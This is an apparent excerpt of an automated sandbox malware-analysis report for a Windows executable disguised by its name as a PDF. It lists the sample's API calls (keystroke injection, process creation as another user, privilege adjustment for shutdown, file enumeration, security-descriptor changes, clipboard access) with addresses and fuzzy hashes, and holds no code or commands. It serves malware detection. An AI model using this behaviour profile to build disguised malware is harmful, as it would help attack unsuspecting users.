                              • Instruction Fuzzy Hash: F842AD706043419FD714DF28C884FABB7A5FF89700F14865EFA489B291C7B8E846CB5A
                              APIs
                              • GetForegroundWindow.USER32 ref: 00434420
                              • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00434446
                              • IsIconic.USER32(?), ref: 0043444F
                              • ShowWindow.USER32(?,00000009), ref: 0043445C
                              • SetForegroundWindow.USER32(?), ref: 0043446A
                              • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00434481
                              • GetCurrentThreadId.KERNEL32 ref: 00434485
                              • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00434493
                              • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 004344A2
                              • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 004344A8
                              • AttachThreadInput.USER32(00000000,?,00000001), ref: 004344B1
                              • SetForegroundWindow.USER32(00000000), ref: 004344B7
                              • MapVirtualKeyW.USER32(00000012,00000000), ref: 004344C6
                              • keybd_event.USER32(00000012,00000000), ref: 004344CF
                              • MapVirtualKeyW.USER32(00000012,00000000), ref: 004344DD
                              • keybd_event.USER32(00000012,00000000), ref: 004344E6
                              • MapVirtualKeyW.USER32(00000012,00000000), ref: 004344F4
                              • keybd_event.USER32(00000012,00000000), ref: 004344FD
                              • MapVirtualKeyW.USER32(00000012,00000000), ref: 0043450B
                              • keybd_event.USER32(00000012,00000000), ref: 00434514
                              • SetForegroundWindow.USER32(00000000), ref: 0043451E
                              • AttachThreadInput.USER32(00000000,?,00000000), ref: 0043453F
                              • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 00434545
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                               • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: ThreadWindow$AttachInput$ForegroundVirtualkeybd_event$Process$CurrentFindIconicShow
                              • String ID: Shell_TrayWnd
                              • API String ID: 2889586943-2988720461
                              • Opcode ID: 8fb90041bee2e10260771149cd23f534c9f7767a381d567acbe6a88cba9e6a8e
                              • Instruction ID: 0b42b206f44700a00bd4aa1610e9651ae8f7722fee000eb3c659fd44b6abead8
                              • Opcode Fuzzy Hash: 8fb90041bee2e10260771149cd23f534c9f7767a381d567acbe6a88cba9e6a8e
                              • Instruction Fuzzy Hash: AD416272640218BFE7205BA4DE4AFBE7B6CDB58B11F10442EFA01EA1D0D6F458419BA9
                              APIs
                              • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?), ref: 0044638E
                              • CloseHandle.KERNEL32(?), ref: 004463A0
                              • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 004463B8
                              • GetProcessWindowStation.USER32 ref: 004463D1
                              • SetProcessWindowStation.USER32(00000000), ref: 004463DB
                              • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 004463F7
                              • _wcslen.LIBCMT ref: 00446498
                                • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                              • _wcsncpy.LIBCMT ref: 004464C0
                              • LoadUserProfileW.USERENV(?,00000020), ref: 004464D9
                              • CreateEnvironmentBlock.USERENV(?,?,00000000), ref: 004464F3
                              • CreateProcessAsUserW.ADVAPI32(?,00000000,00000000,00000000,00000000,?,?,?,?,000F01FF,00000400), ref: 00446522
                              • UnloadUserProfile.USERENV(?,?), ref: 00446555
                              • CloseWindowStation.USER32(00000000), ref: 0044656C
                              • CloseDesktop.USER32(?), ref: 0044657A
                              • SetProcessWindowStation.USER32(?), ref: 00446588
                              • CloseHandle.KERNEL32(?), ref: 00446592
                              • DestroyEnvironmentBlock.USERENV(?), ref: 004465A9
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                               • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: StationWindow$CloseProcess$User$BlockCreateDesktopEnvironmentHandleOpenProfile$DestroyDuplicateLoadTokenUnload_malloc_wcslen_wcsncpy
                              • String ID: $@OH$default$winsta0
                              • API String ID: 3324942560-3791954436
                              • Opcode ID: 52a5cbb7690f64740f818e59e599c99b846dd20d3ab12822ed89c3a639b05c79
                              • Instruction ID: a255b9755a473e3b45922b0ee48cea4cb67e1360e8ecd59b8ab49ad27cdc7b44
                              • Opcode Fuzzy Hash: 52a5cbb7690f64740f818e59e599c99b846dd20d3ab12822ed89c3a639b05c79
                              • Instruction Fuzzy Hash: A28180B0A00209ABEF10CFA5DD4AFAF77B8AF49704F05455EF914A7284D778D901CB69
                              APIs
                              • FindFirstFileW.KERNEL32(00000000,?,?), ref: 004788E4
                              • FindClose.KERNEL32(00000000), ref: 00478924
                              • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00478949
                              • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00478961
                              • FileTimeToSystemTime.KERNEL32(?,?), ref: 00478989
                              • __swprintf.LIBCMT ref: 004789D3
                              • __swprintf.LIBCMT ref: 00478A1D
                              • __swprintf.LIBCMT ref: 00478A4B
                              • __swprintf.LIBCMT ref: 00478A79
                                • Part of subcall function 0041329B: __flsbuf.LIBCMT ref: 00413314
                                • Part of subcall function 0041329B: __flsbuf.LIBCMT ref: 0041332C
                              • __swprintf.LIBCMT ref: 00478AA7
                              • __swprintf.LIBCMT ref: 00478AD5
                              • __swprintf.LIBCMT ref: 00478B03
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                               • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem
                              • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                              • API String ID: 999945258-2428617273
                              • Opcode ID: 438ad41bdba169d6dbcdf3912f97c2a8dc3502a0945a742a170651836116907f
                              • Instruction ID: 8fd0730747e081185947bc4026d2fd3d0a29cbe563c255e8678d3cf3417a7967
                              • Opcode Fuzzy Hash: 438ad41bdba169d6dbcdf3912f97c2a8dc3502a0945a742a170651836116907f
                              • Instruction Fuzzy Hash: 32719772204300ABC310EF55CC85FAFB7E9AF88705F504D2FF645962D1E6B9E944875A
                              APIs
                                • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                              • GetCurrentDirectoryW.KERNEL32(00000104,?,?), ref: 00403451
                              • GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00403467
                              • __wsplitpath.LIBCMT ref: 00403492
                                • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
                              • _wcscpy.LIBCMT ref: 004034A7
                              • _wcscat.LIBCMT ref: 004034BC
                              • SetCurrentDirectoryW.KERNEL32(?), ref: 004034CC
                                • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                                • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                                • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                                • Part of subcall function 00403AF0: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,?,?,?,0040355C,?,?,?,00000010), ref: 00403B08
                                • Part of subcall function 00403AF0: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,?,?,00000010), ref: 00403B41
                              • _wcscpy.LIBCMT ref: 004035A0
                              • _wcslen.LIBCMT ref: 00403623
                              • _wcslen.LIBCMT ref: 0040367D
                              Strings
                              • Error opening the file, xrefs: 00428231
                              • Unterminated string, xrefs: 00428348
                              • #include depth exceeded. Make sure there are no recursive includes, xrefs: 00428200
                              • _, xrefs: 0040371C
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                               • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: _wcslen$ByteCharCurrentDirectoryMultiWide_wcscpystd::exception::exception$Exception@8FullNamePathThrow__wsplitpath__wsplitpath_helper_malloc_memmove_wcscat
                              • String ID: #include depth exceeded. Make sure there are no recursive includes$Error opening the file$Unterminated string$_
                              • API String ID: 3393021363-188983378
                              • Opcode ID: 78f48f825e219418bf9b5df19dfe877f1b72b905c01bd98d046c3c676a5c4f44
                              • Instruction ID: 51a390cb75b153cc6cab8b26b712b327f6f81406d0e69f910df9a3585dc9283e
                              • Opcode Fuzzy Hash: 78f48f825e219418bf9b5df19dfe877f1b72b905c01bd98d046c3c676a5c4f44
                              • Instruction Fuzzy Hash: CCD105B1508341AAD710EF64D841AEFBBE8AF85304F404C2FF98553291DB79DA49C7AB
                              APIs
                              • FindFirstFileW.KERNEL32(?,?), ref: 00431AAA
                              • GetFileAttributesW.KERNEL32(?), ref: 00431AE7
                              • SetFileAttributesW.KERNEL32(?,?), ref: 00431AFD
                              • FindNextFileW.KERNEL32(00000000,?), ref: 00431B0F
                              • FindClose.KERNEL32(00000000), ref: 00431B20
                              • FindClose.KERNEL32(00000000), ref: 00431B34
                              • FindFirstFileW.KERNEL32(*.*,?), ref: 00431B4F
                              • SetCurrentDirectoryW.KERNEL32(?), ref: 00431B96
                              • SetCurrentDirectoryW.KERNEL32(0048AB30), ref: 00431BBA
                              • FindNextFileW.KERNEL32(00000000,00000010), ref: 00431BC2
                              • FindClose.KERNEL32(00000000), ref: 00431BCD
                              • FindClose.KERNEL32(00000000), ref: 00431BDB
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                               • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
                              • String ID: *.*
                              • API String ID: 1409584000-438819550
                              • Opcode ID: 375c8f5163c02f9b34b1ce4408ff1b09f98ffe2d72fc8025119183882b6461df
                              • Instruction ID: b696eadadcb8a1627fc7fa6feda0e6e57aab690e04623b9265854ab7309d24dd
                              • Opcode Fuzzy Hash: 375c8f5163c02f9b34b1ce4408ff1b09f98ffe2d72fc8025119183882b6461df
                              • Instruction Fuzzy Hash: CE41D8726002046BC700EF65DC45EAFB3ACAE89311F04592FF954C3190E7B8E519C7A9
                              APIs
                              • GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00431C09
                              • __swprintf.LIBCMT ref: 00431C2E
                              • _wcslen.LIBCMT ref: 00431C3A
                              • CreateDirectoryW.KERNEL32(?,00000000), ref: 00431C67
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                               • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: CreateDirectoryFullNamePath__swprintf_wcslen
                              • String ID: :$\$\??\%s
                              • API String ID: 2192556992-3457252023
                              • Opcode ID: e3674d1d1678aa5b2072ca287ea13c599f7f343b69fea712d52b9408e430d9c0
                              • Instruction ID: 5b8928ca783b893dacbf0721098a8616f59dd17613a34138e213b27d6ec4c177
                              • Opcode Fuzzy Hash: e3674d1d1678aa5b2072ca287ea13c599f7f343b69fea712d52b9408e430d9c0
                              • Instruction Fuzzy Hash: EE413E726403186BD720DB54DC45FDFB3BCFF58710F00859AFA0896191EBB49A548BD8
                              APIs
                              • GetLocalTime.KERNEL32(?), ref: 004722A2
                              • __swprintf.LIBCMT ref: 004722B9
                              • SHGetFolderPathW.SHELL32(00000000,00000026,00000000,00000000,0048BF68), ref: 004724EC
                              • SHGetFolderPathW.SHELL32(00000000,0000002B,00000000,00000000,0048BF68), ref: 00472506
                              • SHGetFolderPathW.SHELL32(00000000,00000005,00000000,00000000,0048BF68), ref: 00472520
                              • SHGetFolderPathW.SHELL32(00000000,00000023,00000000,00000000,0048BF68), ref: 0047253A
                              • SHGetFolderPathW.SHELL32(00000000,00000019,00000000,00000000,0048BF68), ref: 00472554
                              • SHGetFolderPathW.SHELL32(00000000,0000002E,00000000,00000000,0048BF68), ref: 0047256E
                              • SHGetFolderPathW.SHELL32(00000000,0000001F,00000000,00000000,0048BF68), ref: 00472588
                              • SHGetFolderPathW.SHELL32(00000000,00000017,00000000,00000000,0048BF68), ref: 004725A2
                              • SHGetFolderPathW.SHELL32(00000000,00000016,00000000,00000000,0048BF68), ref: 004725BC
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                               • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: FolderPath$LocalTime__swprintf
                              • String ID: %.3d
                              • API String ID: 3337348382-986655627
                              • Opcode ID: e729fe0eecd02e77c5ee8deaec4c56456965897f8b2a75efd2bc4ea0d4b88c57
                              • Instruction ID: 0d137f706e98bab13a4a4c7fcb7914b07bdb7c22a72ec07ab57cd4d47a51df83
                              • Opcode Fuzzy Hash: e729fe0eecd02e77c5ee8deaec4c56456965897f8b2a75efd2bc4ea0d4b88c57
                              • Instruction Fuzzy Hash: A6C1EC326101185BD710FBA1DD8AFEE7328EB44701F5045BFF909A60C2DBB99B598F64
                              APIs
                              • FindFirstFileW.KERNEL32(?,?), ref: 004428A8
                              • FindNextFileW.KERNEL32(00000000,?), ref: 0044290B
                              • FindClose.KERNEL32(00000000), ref: 0044291C
                              • FindClose.KERNEL32(00000000), ref: 00442930
                              • FindFirstFileW.KERNEL32(*.*,?), ref: 0044294D
                              • SetCurrentDirectoryW.KERNEL32(?), ref: 0044299C
                              • SetCurrentDirectoryW.KERNEL32(0048AB30), ref: 004429BF
                              • FindNextFileW.KERNEL32(00000000,00000010), ref: 004429C9
                              • FindClose.KERNEL32(00000000), ref: 004429D4
                                • Part of subcall function 00433C08: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00433C2A
                              • FindClose.KERNEL32(00000000), ref: 004429E2
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
                              • String ID: *.*
                              • API String ID: 2640511053-438819550
                              • Opcode ID: 8a47bb142582fb369a588aeabde8b58686abdf3d8367fad8d2448c9b03ae91f1
                              • Instruction ID: 696d482812dd8bff2d9106dd2d2144e175b5fe2258968c3fd44c1969776f6f9a
                              • Opcode Fuzzy Hash: 8a47bb142582fb369a588aeabde8b58686abdf3d8367fad8d2448c9b03ae91f1
                              • Instruction Fuzzy Hash: AD410AB2A001186BDB10EBA5ED45FEF73689F89321F50465BFD0493280D6B8DE558BB8
                              APIs
                              • GetCurrentProcess.KERNEL32(00000028,?), ref: 004333CE
                              • OpenProcessToken.ADVAPI32(00000000), ref: 004333D5
                              • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004333EA
                              • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 0043340E
                              • GetLastError.KERNEL32 ref: 00433414
                              • ExitWindowsEx.USER32(?,00000000), ref: 00433437
                              • InitiateSystemShutdownExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,?), ref: 00433466
                              • SetSystemPowerState.KERNEL32(00000001,00000000), ref: 00433479
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: ProcessSystemToken$AdjustCurrentErrorExitInitiateLastLookupOpenPowerPrivilegePrivilegesShutdownStateValueWindows
                              • String ID: SeShutdownPrivilege
                              • API String ID: 2938487562-3733053543
                              • Opcode ID: e998af62085c6697935ed50d35c6a1543144275e53dff9101095b3913992069c
                              • Instruction ID: ad32a9094aef850e2966724807b7d50af50c82f056daff98c21d8f44207777ad
                              • Opcode Fuzzy Hash: e998af62085c6697935ed50d35c6a1543144275e53dff9101095b3913992069c
                              • Instruction Fuzzy Hash: F221C971640205ABF7108FA4EC4EF7FB3ACE708702F144569FE09D51D1D6BA5D408765
                              APIs
                                • Part of subcall function 00436E2B: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 00436E45
                                • Part of subcall function 00436E2B: GetLastError.KERNEL32(?,00000000,?), ref: 00436E4F
                                • Part of subcall function 00436E2B: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 00436E75
                                • Part of subcall function 00436DF7: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 00436E12
                              • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 0044618A
                              • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 004461BE
                              • GetLengthSid.ADVAPI32(?), ref: 004461D0
                              • GetAce.ADVAPI32(?,00000000,?), ref: 0044620D
                              • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00446229
                              • GetLengthSid.ADVAPI32(?), ref: 00446241
                              • GetLengthSid.ADVAPI32(?,00000008,?), ref: 0044626A
                              • CopySid.ADVAPI32(00000000), ref: 00446271
                              • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 004462A3
                              • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 004462C5
                              • SetUserObjectSecurity.USER32(?,00000004,?), ref: 004462D8
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: Security$DescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                              • String ID:
                              • API String ID: 1255039815-0
                              • Opcode ID: cf498e736c0040d611dc61921388a4e783ba54ad69564fff20abd6321b712b19
                              • Instruction ID: cbecfdc94e872455e881353a2ef69e95113e06a92746e25f2a634f38edc45108
                              • Opcode Fuzzy Hash: cf498e736c0040d611dc61921388a4e783ba54ad69564fff20abd6321b712b19
                              • Instruction Fuzzy Hash: C251BC71A00209BBEB10EFA1CD84EEFB778BF49704F01855EF515A7241D6B8DA05CB69
                              APIs
                              • __swprintf.LIBCMT ref: 00433073
                              • __swprintf.LIBCMT ref: 00433085
                              • __wcsicoll.LIBCMT ref: 00433092
                              • FindResourceW.KERNEL32(?,?,0000000E), ref: 004330A5
                              • LoadResource.KERNEL32(?,00000000), ref: 004330BD
                              • LockResource.KERNEL32(00000000), ref: 004330CA
                              • FindResourceW.KERNEL32(?,?,00000003), ref: 004330F7
                              • LoadResource.KERNEL32(?,00000000), ref: 00433105
                              • SizeofResource.KERNEL32(?,00000000), ref: 00433114
                              • LockResource.KERNEL32(?), ref: 00433120
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: Resource$FindLoadLock__swprintf$Sizeof__wcsicoll
                              • String ID:
                              • API String ID: 1158019794-0
                              • Opcode ID: b140e135c5f727b40d296f2f4b3108eaeb1a217ee9fa6a28346dce69b8385e70
                              • Instruction ID: 48d2d5a3af9b637b7fc6f2c6b5a7fdd3517197a5f8dc2ef3994740021b7ed835
                              • Opcode Fuzzy Hash: b140e135c5f727b40d296f2f4b3108eaeb1a217ee9fa6a28346dce69b8385e70
                              • Instruction Fuzzy Hash: C741F1322002146BDB10EF65EC84FAB37ADEB89321F00846BFD01C6245E779DA51C7A8
                              APIs
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                              • String ID:
                              • API String ID: 1737998785-0
                              • Opcode ID: bc1c5a0e04e7211697dd638385d424d337038878635646daacac479226a8eb74
                              • Instruction ID: d84b136cee2c902db59abfe4f82a3f409d39725fe24efd6a62fd8a04edebb5dd
                              • Opcode Fuzzy Hash: bc1c5a0e04e7211697dd638385d424d337038878635646daacac479226a8eb74
                              • Instruction Fuzzy Hash: 334114726001119FC310EFA5EC89B5EB7A4FF54315F00856EF909EB3A1EB75A941CB88
                              APIs
                              • SetErrorMode.KERNEL32(00000001), ref: 0045D627
